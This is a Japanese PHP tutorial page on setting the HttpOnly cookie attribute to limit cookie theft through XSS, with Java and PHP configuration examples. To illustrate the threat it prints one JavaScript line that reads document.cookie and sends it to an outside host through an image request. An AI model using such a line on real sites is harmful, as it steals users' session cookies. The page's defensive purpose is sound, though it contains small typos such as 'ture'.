ホームページ >バックエンド開発 >PHPチュートリアル >PHP は httponly を使用して XSS 攻撃を防止します
HttpOnlyとは何ですか?
cookieにHttpOnly属性を設定すると、jsスクリプトを介してCookie情報が読み取られなくなり、XSS攻撃を効果的に防ぐことができます。詳しくは、Googleで検索してください。
JavaEE の API はサポートされていますか?
現在、Sun は関連する API を発表していませんが、PHP と C# はそれを実装しています。 javaEEに取り組んでいる兄弟はかなり落ち込んでいますが、心配しないでください、以下に回避策があります
3. HttpOnlyの設定例
javaEE response.setHeader("Set-Cookie", "cookiename=value; Path=/;Domain=domainvalue;Max-Age=seconds;HTTPOnly");
この記事では主に、xss攻撃を防ぐためにhttponlyを使用したPHPのxss防御を紹介します。 PHP メソッドで HttpOnly の設定を行うと、必要な友人がそれを参照できます
言うまでもなく、xss の概念は非常に有害です。つまり、Web サイトに xss の脆弱性が現れると、任意の js コードを実行できてしまうのが最も恐ろしいことです。つまり、攻撃者は js を使用して cookie や sessionhijack を取得し、それに多くの機密情報 (ID 情報、管理者情報) などが含まれていれば終わりです。 。 。
次の js は Cookie 情報を取得するために使用されます:
コードは次のとおりです:
url=document.top.location.href; cookie=document.cookie; c=new Image(); c.src='http://www.test.com/c.php?c='+cookie+'&u='+url;
一般に、Cookie を設定するとき、ブラウザは通常、HttpOnly と呼ばれるパラメータを受け入れます。ドメインと他のパラメータは同じです。この HttpOnly が設定されると、ブラウザのドキュメント オブジェクトに Cookie が表示されなくなります。
PHP 設定 HttpOnly
: //在php.ini中,session.cookie_httponly = ture 来开启全局的Cookie的HttpOnly属性
ini_set("session.cookie_httponly", 1);
//或者setcookie()的第七个参数设置为true
session_set_cookie_params(0, NULL, NULL, NULL, TRUE);
PHP5.1 パスより前の PHP バージョンの場合:
header("Set-Cookie: hidden=value; httpOnly");
最後に、HttpOnly は万能薬ではありません。
以上がPHP は httponly を使用して XSS 攻撃を防止しますの詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。